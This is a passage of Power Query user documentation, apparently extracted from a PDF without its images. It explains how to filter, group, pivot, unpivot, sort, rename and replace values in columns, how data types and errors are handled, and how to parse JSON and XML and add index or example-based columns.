The Remove empty command applies two filter rules to your column. The first rule gets
rid of any null values. The second rule gets rid of any blank values. For example, imagine
a table with just one text column with five rows, where you have one null value and one
blank cell.
7 Note
A null value is a specific value in the Power Query language that represents no
value.
You then select Remove empty from the sort and filter menu, as shown in the following
image.
You can also select this option from the Home tab in the Reduce Rows group in the
Remove Rows drop-down options, as shown in the next image.
The result of the Remove empty operation gives you the same table without the empty
values.
Clear filter
When a filter is applied to a column, the Clear filter command appears on the sort and
filter menu.
Auto filter
The list in the sort and filter menu is called the auto filter list, which shows the unique
values in your column. You can manually select or deselect which values to include in the
list. Any selected values will be taken into consideration by the filter; any values that
aren't selected will be ignored.
This auto filter section also has a search bar to help you find any values from your list.
7 Note
When you load the auto filter list, only the top 1,000 distinct values in the column
are loaded. If there are more than 1,000 distinct values in the column in the that
you're filtering, a message will appear indicating that the list of values in the filter
list might be incomplete, and the Load more link appears. Select the Load more
link to load another 1,000 distinct values.
If exactly 1,000 distinct values are found again, the list is displayed with a
message stating that the list might still be incomplete.
If fewer than 1,000 distinct values are found, the full list of values is shown.
Power Query displays a type-specific filter based on the data type of the column.
Type-specific filters
Depending on the data type of your column, you'll see different commands in the sort
and filter menu. The following images show examples for date, text, and numeric
columns.
Filter rows
When selecting any of the type-specific filters, you'll use the Filter rows dialog box to
specify filter rules for the column. This dialog box is shown in the following image.
The Filter rows dialog box has two modes: Basic and Advanced.
Basic
With basic mode, you can implement up to two filter rules based on type-specific filters.
In the preceding image, notice that the name of the selected column is displayed after
the label Keep rows where, to let you know which column these filter rules are being
implemented on.
For example, imagine that in the following table, you want to filter the Account Code by
all values that start with either PA or PTY.
To do that, you can go to the Filter rows dialog box for the Account Code column and
specify the set of filter rules you want.
In this example, first select the Basic button. Then under Keep rows where "Account
Code", select begins with, and then enter PA. Then select the or button. Under the or
button, select begins with, and then enter PTY. The select OK.
The result of that operation will give you the set of rows that you're looking for.
Advanced
With advanced mode, you can implement as many type-specific filters as necessary from
all the columns in the table.
For example, imagine that instead of applying the previous filter in basic mode, you
wanted to implement a filter to Account Code to show all values that end with 4. Also,
you want to show values over $100 in the Sales column.
In this example, first select the Advanced button. In the first row, select Account Code
under Column name, ends with under Operator, and select 4 for the Value. In the
second row, select and, and then select Sales under Column Name, is greater than
under Operator, and 100 under Value. Then select OK
The result of that operation will give you just one row that meets both criteria.
7 Note
You can add as many clauses as you'd like by selecting Add clause. All clauses act
at the same level, so you might want to consider creating multiple filter steps if you
need to implement filters that rely on other filters.
Choose or remove columns
Article • 12/17/2022
Choose columns and Remove columns are operations that help you define what
columns your table needs to keep and which ones it needs to remove. This article will
showcase how to use the Choose columns and Remove columns commands by using
the following sample table for both operations.
The goal is to create a table that looks like the following image.
Choose columns
On the Home tab, in the Manage columns group, select Choose columns.
The Choose columns dialog box appears, containing all the available columns in your
table. You can select all the fields that you want to keep and remove specific fields by
clearing their associated check box. For this example, you want to remove the GUID and
Report created by columns, so you clear the check boxes for those fields.
After selecting OK, you'll create a table that only contains the Date, Product,
SalesPerson, and Units columns.
Remove columns
When you select Remove columns from the Home tab, you have two options:
After selecting Remove columns, you'll create a table that only contains the Date,
Product, SalesPerson, and Units columns.
In Power Query, you can group values in various rows into a single value by grouping
the rows according to the values in one or more columns. You can choose from two
types of grouping operations:
Column groupings.
Row groupings.
Operations available
With the Group by feature, the available operations can be categorized in two ways:
Percentile Column Calculates the percentile, using an input value from 0 to 100,
operation from a column
Count distinct Column Calculates the number of distinct values from a column
values operation
Count rows Row Calculates the total number of rows from a given group
operation
Count distinct Row Calculates the number of distinct rows from a given group
rows operation
All rows Row Outputs all grouped rows in a table value with no
operation aggregations
7 Note
The Count distinct values and Percentile operations are only available in Power
Query Online.
Country
Sales Channel
After that operation is complete, notice how the Products column has [Table] values
inside each cell. Each [Table] value contains all the rows that were grouped by the
Country and Sales Channel columns from your original table. You can select the white
space inside the cell to see a preview of the contents of the table at the bottom of the
dialog box.
7 Note
The details preview pane might not show all the rows that were used for the group-
by operation. You can select the [Table] value to see all rows pertaining to the
corresponding group-by operation.
Next, you need to extract the row that has the highest value in the Units column of the
tables inside the new Products column, and call that new column Top performer
product.
Name your new column Top performer product. Enter the formula
Table.Max([Products], "Units" ) under Custom column formula.
The result of that formula creates a new column with [Record] values. These record
values are essentially a table with just one row. These records contain the row with the
maximum value for the Units column of each [Table] value in the Products column.
With this new Top performer product column that contains [Record] values, you can
select the expand icon, select the Product and Units fields, and then select OK.
After removing your Products column and setting the data type for both newly
expanded columns, your result will resemble the following image.
Fuzzy grouping
7 Note
To demonstrate how to do "fuzzy grouping," consider the sample table shown in the
following image.
The goal of fuzzy grouping is to do a group-by operation that uses an approximate
match algorithm for text strings. Power Query uses the Jaccard similarity algorithm to
measure the similarity between pairs of instances. Then it applies agglomerative
hierarchical clustering to group instances together. The following image shows the
output that you expect, where the table will be grouped by the Person column.
To do the fuzzy grouping, you perform the same steps previously described in this
article. The only difference is that this time, in the Group by dialog box, you select the
Use fuzzy grouping check box.
For each group of rows, Power Query will pick the most frequent instance as the
"canonical" instance. If multiple instances occur with the same frequency, Power Query
will pick the first one. After you select OK in the Group by dialog box, you'll get the
result that you were expecting.
However, you have more control over the fuzzy grouping operation by expanding Fuzzy
group options.
The following options are available for fuzzy grouping:
Similarity threshold (optional): This option indicates how similar two values must
be to be grouped together. The minimum setting of 0 will cause all values to be
grouped together. The maximum setting of 1 will only allow values that match
exactly to be grouped together. The default is 0.8.
Ignore case: When comparing text strings, case will be ignored. This option is
enabled by default.
Group by combining text parts: The algorithm will try to combine text parts (such
as combining Micro and soft into Microsoft) to group values.
Show similarity scores: Show similarity scores between the input values and the
computed representative values after fuzzy grouping. Requires the addition of an
operation such as All rows to showcase this information on a row-by-row level.
Transformation table (optional): You can select a transformation table that will
map values (such as mapping MSFT to Microsoft) to group them together.
For this example, a transformation table will be used to demonstrate how values can be
mapped. The transformation table has two columns:
) Important
It's important that the transformation table has a the same columns and column
names as shown above (they have to be "From" and "To"), otherwise Power Query
will not recognize these.
Return to the Group by dialog box, expand Fuzzy group options, change the operation
from Count rows to All rows, enable the Show similarity scores option, and then select
the Transformation table drop-down menu.
After you select the transformation table, select OK. The result of that operation gives
you the following information:
In this example, the Ignore case option was enabled, so the values in the From column
of the Transformation table are used to look for the text string without considering the
case of the string. This transformation operation occurs first, and then the fuzzy
grouping operation is performed.
The similarity score is also shown in the table value next to the person column, which
reflects exactly how the values were grouped and their respective similarity scores. You
can expand this column if needed or use the values from the new Frequency columns
for other sorts of transformations.
7 Note
When grouping by multiple columns, the transformation table performs the replace
operation in all columns if replacing the value increases the similarity score.
See also
Add a custom column
Remove duplicates
Unpivot columns
Article • 12/17/2022
In Power Query, you can transform columns into attribute-value pairs, where columns
become rows.
For example, given a table like the following, where country rows and date columns
create a matrix of values, it's difficult to analyze the data in a scalable way.
Instead, you can transform the table into a table with unpivoted columns, as shown in
the following image. In the transformed table, it's easier to use the date as an attribute
to filter on.
The key in this transformation is that you have a set of dates in the table that should all
be part of a single column. The respective value for each date and country should be in
a different column, effectively creating an attribute-value pair.
Power Query will always create the attribute-value pair by using two columns:
There are multiple places in the user interface where you can find Unpivot columns. You
can right-click the columns that you want to unpivot, or you can select the command
from the Transform tab in the ribbon.
There are three ways that you can unpivot columns from a table:
Unpivot columns
Unpivot other columns
Unpivot only selected columns
Unpivot columns
For the scenario described above, you first need to select the columns you want to
unpivot. You can select Ctrl as you select as many columns as you need. For this
scenario, you want to select all the columns except the one named Country. After
selecting the columns, right-click any of the selected columns, and then select Unpivot
columns.
The result of that operation will yield the result shown in the following image.
Special considerations
After creating your query from the steps above, imagine that your initial table gets
updated to look like the following screenshot.
Notice that you've added a new column for the date 9/1/2020 (September 1, 2020), and
two new rows for the countries UK and Mexico.
If you refresh your query, you'll notice that the operation will be done on the updated
column, but won't affect the column that wasn't originally selected (Country, in this
example). This means that any new column that's added to the source table will be
unpivoted as well.
The following image shows what your query will look like after the refresh with the new
updated source table.
Unpivot other columns
You can also select the columns that you don't want to unpivot and unpivot the rest of
the columns in the table. This operation is where Unpivot other columns comes into
play.
The result of that operation will yield exactly the same result as the one you got from
Unpivot columns.
7 Note
This transformation is crucial for queries that have an unknown number of columns.
The operation will unpivot all columns from your table except the ones that you've
selected. This is an ideal solution if the data source of your scenario got new date
columns in a refresh, because those will get picked up and unpivoted.
Special considerations
Similar to the Unpivot columns operation, if your query is refreshed and more data is
picked up from the data source, all the columns will be unpivoted except the ones that
were previously selected.
To illustrate this, say that you have a new table like the one in the following image.
You can select the Country column, and then select Unpivot other column, which will
yield the following result.
Unpivot only selected columns
The purpose of this last option is to only unpivot specific columns from your table. This
is important for scenarios where you're dealing with an unknown number of columns
from your data source and you only want to unpivot the selected columns.
To perform this operation, select the columns to unpivot, which in this example is all the
columns except the Country column. Then right-click any of the columns you selected,
and then select Unpivot only selected columns.
Notice how this operation will yield the same output as the previous examples.
Special considerations
After doing a refresh, if our source table changes to have a new 9/1/2020 column and
new rows for UK and Mexico, the output of the query will be different from the previous
examples. Say that our source table, after a refresh, changes to the table in the following
image.
The output of our query will look like the following image.
It looks like this because the unpivot operation was applied only on the 6/1/2020,
7/1/2020, and 8/1/2020 columns, so the column with the header 9/1/2020 remains
unchanged.
Pivot columns
Article • 12/17/2022
In Power Query, you can create a table that contains an aggregate value for each unique
value in a column. Power Query groups each unique value, does an aggregate
calculation for each value, and pivots the column into a new table.
This table contains values by country and date in a simple table. In this example, you
want to transform this table into the one where the date column is pivoted, as shown in
the following image.
7 Note
During the pivot columns operation, Power Query will sort the table based on the
values found on the first column—at the left side of the table—in ascending order.
To pivot a column
2. On the Transform tab in the Any column group, select Pivot column.
3. In the Pivot column dialog box, in the Value column list, select Value.
By default, Power Query will try to do a sum as the aggregation, but you can select
the Advanced option to see other available aggregations.
The available options are:
Don't aggregate
Count (all)
Count (not blank)
Minimum
Maximum
Median
Sum
Average
In the Pivot column dialog box, select the Product column as the value column. Select
the Advanced option button in the Pivot columns dialog box, and then select Don't
aggregate.
The result of this operation will yield the result shown in the following image.
You want to pivot that table by using the Date column, and you want to use the values
from the Value column. Because this pivot would make your table have just the Country
values on rows and the Dates as columns, you'd get an error for every single cell value
because there are multiple rows for every combination of Country and Date. The
outcome of the Pivot column operation will yield the results shown in the following
image.
Notice the error message "Expression.Error: There were too many elements in the
enumeration to complete the operation." This error occurs because the Don't aggregate
operation only expects a single value for the country and date combination.
Transpose a table
Article • 12/17/2022
The transpose table operation in Power Query rotates your table 90 degrees, turning
your rows into columns and your columns into rows.
Imagine a table like the one in the following image, with three rows and four columns.
The goal of this example is to transpose that table so you end up with four rows and
three columns.
The result of that operation will look like the following image.
7 Note
Only the contents of the table will be transposed during the transpose operation;
the column headers of the initial table will be lost. The new columns will have the
name Column followed by a sequential number.
The headers you need in this example are in the first row of the table. To promote the
first row to headers, select the table icon in the upper-left corner of the data preview,
and then select Use first row as headers.
The result of that operation will give you the output that you're looking for.
7 Note
To learn more about the promote headers operation, also known as Use first row
as headers, go to Promote or demote column headers.
Reverse rows
Article • 12/17/2022
With Power Query, it's possible to reverse the order of rows in a table.
Imagine a table with two columns, ID and Country, as shown in the following image.
Data types in Power Query are used to classify values to have a more structured dataset.
Data types are defined at the field level—values inside a field are set to conform to the
data type of the field.
The data type of a column is displayed on the left side of the column heading with an
icon that symbolizes the data type.
7 Note
The most common data types used in Power Query are listed in the following table.
Although beyond the scope of this article, you can find the complete list of data types in
the Power Query M formula language Types article.
Fixed decimal Also known as the Currency type, this data type has a fixed
number location for the decimal separator. The decimal separator always
has four digits to its right and allows for 19 digits of significance.
The largest value it can represent is 922,337,203,685,477.5807
(positive or negative). Unlike Decimal Number, the Fixed Decimal
Number type is always precise and is thus useful in cases where
the imprecision of floating-point notation might introduce errors.
Date/Time Represents both a date and time value. Underneath the covers,
the Date/Time value is stored as a Decimal Number type, so you
can actually convert between the two. The time portion of a date
is stored as a fraction to whole multiples of 1/300 seconds (3.33
ms). Dates between the years 1900 and 9999 are supported.
Date Represents just a date (no time portion). When converted into the
model, a Date is the same as a Date/Time value with zero for the
fractional value.
Data type Icon Description
Time Represents just time (no date portion). When converted into the
model, a Time value is the same as a Date/Time value with no
digits to the left of the decimal place.
Binary The Binary data type can be used to represent any other data with
a binary format.
Any The Any data type is the status given to a column that doesn't
have an explicit data type definition. Any is the data type that
classifies all values. We recommend that you always explicitly
define the column data types for your queries from unstructured
sources, and avoid having any columns with the Any data type as
the output of your query.
Structured data sources such as databases, Power Query reads the table schema
from the data source and automatically displays the data by using the correct data
type for each column.
Unstructured sources such as Excel, CSV, and text files, Power Query automatically
detects data types by inspecting the values in the table. By default, automatic data
type detection is enabled in Power Query for unstructured sources.
You can also use the Detect data type command in the Any column group on the
Transform tab to automatically detect the data types of the columns in your table.
How to define a column data type
You can define or change the data type of a column in any of four places:
On the Home tab, in the Transform group, on the Data type drop-down menu.
On the Transform tab, in the Any column group, on the Data type drop-down
menu.
Promote column headers: Promotes the first row of the table to be the column
header.
Changed type: Converts the values from the Any data type to a data type based
on the inspection of the values from each column.
By default, this setting is enabled. To disable or enable this setting, follow the steps that
apply to your Power Query experience.
You can define this behavior both at the global and per-file level in the Options window
(in the Power Query Editor, on the File tab, select Options and settings > Options).
Global: On the left pane under Global, select Data load. On the right pane under
Type detection, you can select any of three type detection configurations that will
be applied to every new file created in your application:
Always detect column types and headers for unstructured sources
Detect column types and headers for unstructured sources according to each
file's setting
Never detect column types and headers for unstructured sources
Current file: On the left pane under Current file, select Data load. On the right
pane under Type detection, select whether you want to enable or disable type
detection for the current file.
Document or project locale
Power Query handles two distinct components that manage the way that things look
and are interpreted:
Localization: the component that tells Power Query in what language it should be
displayed.
Globalization: the component that handles the formatting of the values, in addition
to the interpretation of text values.
Locale is a single value that holds both the localization and globalization components.
Locale is used to interpret text values and convert them into other data types. For
example, the locale English (United States) means that the localization is in United
States English and the globalization, or format of the value, is based on the standards
used in the United States.
When Power Query defines a column data type or converts from one data type to
another, it has to interpret the values to be converted before it can transform them to a
different data type.
In Power Query for Desktop, Power Query automatically recognizes your operating
system regional format and uses that to interpret the values for data type
conversion. To override this locale configuration, open the query Options window,
and in the left pane under Current file, select Regional settings. From here, you
can change the locale to the setting you want.
This locale setting is important for interpreting text values into a specific data type. For
example, imagine that you have your locale set as English (United States), but a column
in one of your CSV files has dates formatted in the United Kingdom format of
day/month/year.
When you try setting the data type of the Date column to be Date, you get error values.
These errors occur because the locale being used is trying to interpret the date in the
English (United States) format, which is month/day/year. Because there's no month 22 in
the calendar, it causes an error.
Instead of trying to just select the Date data type, you can right-click the column
heading, select Change type, and then select Using locale.
In the Change column type with locale dialog box, you select the data type that you
want to set, but you also select which locale to use, which in this case needs to be
English (United Kingdom).
Using this locale, Power Query will be able to interpret values correctly and convert
those values to the right data type.
The formatting of the values is driven by the globalization value. If you have any doubts
about the value displayed by Power Query, you can verify the conversion of date values
by adding new columns for the day, month, and year from the value. To do this, select
the Date column and go to the Add column tab on the ribbon. In the Date and time
column group, you'll see the options for a date column.
From here, you can extract parts of the date value, such as the year number, the month
number, the day number, or even more columns extracted from the Date column.
By using these columns, you can verify that your date value has been converted
correctly.
Conversion in this matrix starts with the original data type in the Data types
column. Each result of a conversion to the new type is shown in the original data
type’s row.
Data Types
Decimal number —
Currency —
Whole number —
Percentage —
Date/Time —
Date —
Time —
Date/Time/Timezone —
Duration —
Text —
True/False —
Icon Description
Possible
Not possible
Step-level errors
Cell-level errors
This article provides suggestions for how to fix the most common errors you might find
at each level, and describes the error reason, error message, and error detail for each.
Step-level error
A step-level error prevents the query from loading and displays the error components in
a yellow pane.
Error reason: The first section before the colon. In the example above, the error
reason is Expression.Error.
Error message: The section directly after the reason. In the example above, the
error message is The column 'Column' of the table wasn't found.
Error detail: The section directly after the Details: string. In the example above, the
error detail is Column.
Example: You have a query from a text tile that was located in drive D and created by
user A. User A shares the query with user B, who doesn't have access to drive D. When
this person tries to execute the query, they get a DataSource.Error because there's no
drive D in their environment.
Possible solutions: You can change the file path of the text file to a path that both users
have access to. As user B, you can change the file path to be a local copy of the same
text file. If the Edit settings button is available in the error pane, you can select it and
change the file path.
Example: You have a query from a text file where one of the column names was Column.
In your query, you have a step that renames that column to Date. But there was a
change in the original text file, and it no longer has a column heading with the name
Column because it was manually changed to Date. Power Query is unable to find a
column heading named Column, so it can't rename any columns. It displays the error
shown in the following image.
Possible solutions: There are multiple solutions for this case, but they all depend on
what you'd like to do. For this example, because the correct Date column header already
comes from your text file, you can just remove the step that renames the column. This
will allow your query to run without this error.
This error can be caused by a number of reasons, such as the data privacy levels
between data sources or the way that these data sources are being combined or
merged. For more information about how to diagnose this issue, go to Data privacy
firewall.
Cell-level error
A cell-level error won't prevent the query from loading, but displays error values as Error
in the cell. Selecting the white space in the cell displays the error pane underneath the
data preview.
7 Note
The data profiling tools can help you more easily identify cell-level errors with the
column quality feature. More information: Data profiling tools
Remove errors
To remove rows with errors in Power Query, first select the column that contains errors.
On the Home tab, in the Reduce rows group, select Remove rows. From the drop-down
menu, select Remove errors.
The result of that operation will give you the table that you're looking for.
Replace errors
If instead of removing rows with errors, you want to replace the errors with a fixed value,
you can do so as well. To replace rows that have errors, first select the column that
contains errors. On the Transform tab, in the Any column group, select Replace values.
From the drop-down menu, select Replace errors.
In the Replace errors dialog box, enter the value 10 because you want to replace all
errors with the value 10.
The result of that operation will give you the table that you're looking for.
Keep errors
Power Query can serve as a good auditing tool to identify any rows with errors even if
you don't fix the errors. This is where Keep errors can be helpful. To keep rows that have
errors, first select the column that contains errors. On the Home tab, in the Reduce rows
group, select Keep rows. From the drop-down menu, select Keep errors.
The result of that operation will give you the table that you're looking for.
Commonly triggered when changing the data type of a column in a table. Some values
found in the column could not be converted to the desired data type.
Example: You have a query that includes a column named Sales. One cell in that column
has NA as a cell value, while the rest have whole numbers as values. You decide to
convert the data type of the column from text to whole number, but the cell with the
NA value causes an error.
Possible solutions: After identifying the row with the error, you can either modify the
data source to reflect the correct value rather than NA, or you can apply a Replace error
operation to provide a value for any NA values that cause an error.
Operation errors
When trying to apply an operation that isn't supported, such as multiplying a text value
by a numeric value, an error occurs.
Example: You want to create a custom column for your query by creating a text string
that contains the phrase "Total Sales: " concatenated with the value from the Sales
column. An error occurs because the concatenation operation only supports text
columns and not numeric ones.
Possible solutions: Before creating this custom column, change the data type of the
Sales column to be text.
When working with data that contains nested structured values (such as tables, lists, or
records), you may sometimes encounter the following error:
Expression.Error: We cannot return a value of type {value} in this context
Details: In the past we would have returned a text value of {value}, but we
now return this error. Please see https://go.microsoft.com/fwlink/?
linkid=2099726 for more information.
When the Data Privacy Firewall buffers a data source, nested non-scalar values are
automatically converted to errors.
When a column defined with the Any data type contains non-scalar values, such
values will be reported as errors during load (such as in a Workbook in Excel or the
data model in Power BI Desktop).
Possible solutions:
Remove the column that contains the error, or set a non- Any data type for such a
column.
Change the privacy levels of the data sources involved to one that allows them to
be combined without being buffered.
Flatten the tables before doing a merge to eliminate columns that contain nested
structured values (such as table, record, or list).
Working with duplicate values
Article • 12/17/2022
You can work with duplicate sets of values through transformations that can remove
duplicates from your data or filter your data to show duplicates only, so you can focus
on them.
2 Warning
Power Query is case-sensitive. When working with duplicate values, Power Query
considers the case of the text, which might lead to undesired results. As a
workaround, users can apply an uppercase or lowercase transform prior to
removing duplicates.
For this article, the examples use the following table with id, Category, and Total
columns.
Remove duplicates
One of the operations that you can perform is to remove duplicate values from your
table.
There's no guarantee that the first instance in a set of duplicates will be chosen
when duplicates are removed. To learn more about how to preserve sorting, go to
Preserve sort.
You have four rows that are duplicates. Your goal is to remove those duplicate rows so
there are only unique rows in your table. Select all columns from your table, and then
select Remove duplicates.
The result of that operation will give you the table that you're looking for.
7 Note
You want to remove those duplicates and only keep unique values. To remove duplicates
from the Category column, select it, and then select Remove duplicates.
The result of that operation will give you the table that you're looking for.
Keep duplicates
Another operation you can perform with duplicates is to keep only the duplicates found
in your table.
You have four rows that are duplicates. Your goal in this example is to keep only the
rows that are duplicated in your table. Select all the columns in your table, and then
select Keep duplicates.
The result of that operation will give you the table that you're looking for.
In this example, you have multiple duplicates and you want to keep only those
duplicates from your table. To keep duplicates from the id column, select the id column,
and then select Keep duplicates.
The result of that operation will give you the table that you're looking for.
See also
Data profiling tools
Fill values in a column
Article • 12/17/2022
You can use fill up and fill down to replace null values with the last non-empty value in a
column. For example, imagine the following table where you'd like to fill down in the
Date column and fill up in the Comments column.
Fill down
The fill down operation takes a column and traverses through the values in it to fill any
null values in the next rows until it finds a new value. This process continues on a row-
by-row basis until there are no more values in that column.
In the following example, you want to fill down on the Date column. To do that, you can
right-click to select the Date column, and then select Fill > Down.
The result of that operation will look like the following image.
Fill up
In the same way as the fill down operation, fill up works on a column. But by contrast, fill
up finds the last value of the column and fills any null values in the previous rows until it
finds a new value. Then the same process occurs for that value. This process continues
until there are no more values in that column.
In the following example, you want to fill the Comments column from the bottom up.
You'll notice that your Comments column doesn't have null values. Instead it has what
appears to be empty cells. Before you can do the fill up operation, you need to
transform those empty cells into null values: select the column, go to the Transform tab,
and then select Replace values.
In the Replace values dialog box, leave Value to find blank. For Replace with, enter null.
After all empty cells are replaced with null, select the Comments column, go to the
Transform tab, and then select Fill > Up.
The result of that operation will look like the following image.
3. Remove the Sales Person: values from the Sales Person column so you only get
the names of the salespeople.
Now you should have exactly the table you were looking for.
See also
Replace values
Sort columns
Article • 08/09/2023
You can sort a table in Power Query by one column or multiple columns. For example,
take the following table with the columns named Competition, Competitor, and
Position.
For this example, the goal is to sort this table by the Competition and Position fields in
ascending order.
When sorted using sort descending, an alphabetical column is sorted in the following
way:
To sort a table by using columns
To sort the table, first select the column to be sorted. After the column has been
selected, you can select the sort operation from one of two places:
On the Home tab, in the Sort group, there are icons to sort your column in either
ascending or descending order.
From the column heading drop-down menu. Next to the name of the column
there's a drop-down menu indicator . When you select the icon, you'll see the
option to sort the column.
In this example, first you need to sort the Competition column. You'll perform the
operation by using the buttons in the Sort group on the Home tab. This action creates a
new step in the Applied steps section named Sorted rows.
A visual indicator, displayed as an arrow pointing up, gets added to the Competitor
drop-down menu icon to show that the column is being sorted in ascending order.
Now you'll sort the Position field in ascending order as well, but this time you'll use the
Position column heading drop-down menu.
Notice that this action doesn't create a new Sorted rows step, but modifies it to perform
both sort operations in one step. When you sort multiple columns, the order that the
columns are sorted in is based on the order the columns were selected in. A visual
indicator, displayed as a number to the left of the drop-down menu indicator, shows the
place each column occupies in the sort order.
Select the down arrow next to the column heading, and then select Clear sort.
In Applied steps on the Query Settings pane, delete the Sorted rows step.
Rename columns
Article • 12/17/2022
In Power Query, you can rename columns to format the dataset in a clear and concise
way.
Column 1 Column 2
Panama Panama
Canada Toronto
The column headers are Column 1 and Column 2, but you want to change those names
to more friendly names for your columns.
The end result that you want in Power Query looks like the following table.
Double-click the column header: The double-click action immediately lets you
rename the column.
Right-click the column of your choice: A contextual menu is displayed and you
can select the Rename option to rename the selected column.
Rename option in the Transform tab: In the Transform tab, under the Any column
group, select the Rename option.
For example, for the first sample table provided in this article, imagine that you try to
rename both Column 1 and Column 2 to "Geography". An error message pops up that
prevents you from renaming the second column to "Geography".
Promoting your column headers from your first row: For example, if you tried
promoting the first row of the sample table in this article, Power Query renames
the columns to Panama and Panama_1.
7 Note
To learn more about how to promote headers from your first row, go
toPromote or demote column headers.
Expanding a column with a field name that also exists in the current table: This
can happen, for example, when you perform a merge operation and the column
with the merged table has field names that also exist in the table. When you try to
expand the fields from that column, Power Query automatically tries to
disambiguate to prevent Column Name Conflict errors.
Move columns
Article • 02/17/2023
To accomplish this move, you can either select the Move option or drag and drop the
column.
Move option
The following example shows the different ways of moving columns. This example
focuses on moving the Contact Name column.
You move the column using the Move option. This option located in the Any column
group under the Transform tab. In the Move option, the available choices are:
Before
After
To beginning
To end
You can also find this option when you right-click a column.
If you want to move one column to the left, then select Before.
The new location of the column is now one column to the left of its original location.
If you want to move one column to the right, then select After.
The new location of the column is now one column to the right of its original location.
If you want to move the column to the most left space of the dataset, then select To
beginning.
The new location of the column is now on the far left side of the table.
If you want to move the column to the most right space of the dataset, then select To
end.
The new location of the column is now on the far right side of the table.
From there, you can specifically select the column you would like to view, which is
especially useful if there are many columns.
Replace values and errors
Article • 12/17/2022
With Power Query, you can replace one value with another value wherever that value is
found in a column. The Replace values command can be found:
On the cell shortcut menu. Right-click the cell to replace the selected value in the
column with another value.
Replace entire cell contents: This is the default behavior for non-text columns,
where Power Query searches for and replaces the full contents of a cell. You can
enable this mode for text columns by selecting Advanced options, and then
selecting the Match entire cell contents check box.
Replace instances of a text string: This is the default behavior for text columns,
where Power Query will search for a specific text string in all rows of a column and
replace as many instances of the text string that it finds.
Advanced options are only available in columns of the Text data type. Within that set of
options is the Replace using special characters option.
Replace entire cell contents
Imagine a table like the following, where you have columns for Account ID, Category
Name, and Sales Goal.
The value of -1 in the Sales Goal column is an error in the source and needs to be
replaced with the standard sales goal defined by the business for these instances, which
is 250,000. To do that, right-click the -1 value, and then select Replace values. This action
will bring up the Replace values dialog box with Value to find set to -1. Now all you
need to do is enter 250000 in the Replace with box.
The outcome of that operation will give you the result that you're looking for.
In Power Query, you can parse the contents of a column with text strings by identifying
the contents as either a JSON or XML text string.
You can perform this parse operation by selecting the Parse button found inside the
following places in the Power Query Editor:
Transform tab—This button will transform the existing column by parsing its
contents.
Add column tab—This button will add a new column to the table parsing the
contents of the selected column.
For this article, you'll be using the following sample table that contains the following
columns that you need to parse:
JSON
{
"id" : 249319,
"FirstName": "Lesa",
"LastName": "Byrd"
}
Country—Contains unparsed XML text strings with information about the Country
and the Division that the account has been assigned to, as in the following
example.
XML
<root>
<id>1</id>
<Country>USA</Country>
<Division>BI-3316</Division>
</root>
The goal is to parse the above mentioned columns and expand the contents of those
columns to get this output.
As JSON
Select the SalesPerson column. Then select JSON from the Parse dropdown menu inside
the Transform tab. These steps will transform the SalesPerson column from having text
strings to having Record values, as shown in the next image. You can select anywhere in
the whitespace inside the cell of the Record value to get a detailed preview of the
record contents at the bottom of the screen.
Select the expand icon next to the SalesPerson column header. From the expand
columns menu, select only the FirstName and LastName fields, as shown in the
following image.
The result of that operation will give you the following table.
As XML
Select the Country column. Then select the XML button from the Parse dropdown menu
inside the Transform tab. These steps will transform the Country column from having
text strings to having Table values as shown in the next image. You can select anywhere
in the whitespace inside the cell of the Table value to get a detailed preview of the
contents of the table at the bottom of the screen.
Select the expand icon next to the Country column header. From the expand columns
menu, select only the Country and Division fields, as shown in the following image.
You can define all the new columns as text columns. The result of that operation will
give you the output table that you're looking for.
Add a column from examples
Article • 12/17/2022
When you add columns from examples, you can quickly and easily create new columns
that meet your needs. This is useful for the following situations:
You know the data you want in your new column, but you're not sure which
transformation, or collection of transformations, will get you there.
You already know which transformations you need, but you're not sure what to
select in the UI to make them happen.
You know all about the transformations you need by using a custom column
expression in the M language, but one or more of those transformations aren't
available in the UI.
The Column from examples command is located on the Add column tab, in the
General group.
Range: Create bins for the Monthly Income column in discrete increments of
5,000.
Full Name: Concatenate the Last Name and First Name columns to a single
column.
To do this, select the Monthly Income column, select the Column from examples
command, and then select From selection.
The preview pane displays a new, editable column where you can enter your examples.
For the first example, the value from the selected column is 19500. So in your new
column, enter the text 15000 to 20000, which is the bin where that value falls.
When Power Query finds a matching transformation, it fills the transformation results
into the remaining rows using light-colored text. You can also see the M formula text for
the transformation above the table preview.
After you select OK, you'll see your new column as part of your query. You'll also see a
new step added to your query.
To do this, select the Column from examples command, and then select From all
columns.
Now you'll enter your first Full Name example as Enders, Maria.
After you select OK, you'll see your new column as part of your query. You'll also see a
new step added to your query.
Your last step is to remove the First Name, Last Name, and Monthly Income columns.
Your final table now contains the Range and Full Name columns with all the data you
produced in the previous steps.
Tips and considerations
When providing examples, Power Query offers a helpful list of available fields, values,
and suggested transformations for the selected columns. You can view this list by
selecting any cell of the new column.
It's important to note that the Column from examples experience works only on the top
100 rows of your data preview. You can apply steps before the Column from examples
step to create your own data sample. After the Column from examples column has
been created, you can delete those prior steps; the newly created column won't be
affected.
General
Conditional Column
Reference
Text transformations
7 Note
All Text transformations take into account the potential need to trim, clean, or apply
a case transformation to the column value.
Date transformations
Day
Day of Week
Day of Week Name
Day of Year
Month
Month Name
Quarter of Year
Week of Month
Week of Year
Year
Age
Start of Year
End of Year
Start of Month
End of Month
Start of Quarter
Days in Month
End of Quarter
Start of Week
End of Week
Day of Month
Start of Day
End of Day
Time transformations
Hour
Minute
Second
To Local Time
7 Note
All Date and Time transformations take into account the potential need to convert
the column value to Date, Time, or DateTime.
Number transformations
Absolute Value
Arccosine
Arcsine
Arctangent
Convert to Number
Cosine
Cube
Divide
Exponent
Factorial
Integer Divide
Is Even
Is Odd
Ln
Base-10 Logarithm
Modulo
Multiply
Round Down
Round Up
Sign
Sine
Square Root
Square
Subtract
Sum
Tangent
Bucketing/Ranges
Add an index column
Article • 12/17/2022
The Index column command adds a new column to the table with explicit position
values, and is usually created to support other transformation patterns.
By default, the starting index will start from the value 0 and have an increment of 1 per
row.
You can also configure the behavior of this step by selecting the Custom option and
configuring two parameters:
For the example in this article, you start with the following table that has only one
column, but notice the data pattern in the column.
Let's say that your goal is to transform that table into the one shown in the following
image, with the columns Date, Account, and Sale.
In the Modulo dialog box, enter the number from which to find the remainder for each
value in the column. In this case, your pattern repeats itself every three rows, so you'll
enter 3.
The result of that operation will give you a new column named Modulo.
Remove the Index column, because you no longer need it. Your table now looks like the
following image.
Step 4. Pivot a column
Your table now has three columns where:
To achieve the table you want, you need to pivot the Modulo column by using the
values from Column1 where these values don't get aggregated. On the Transform tab,
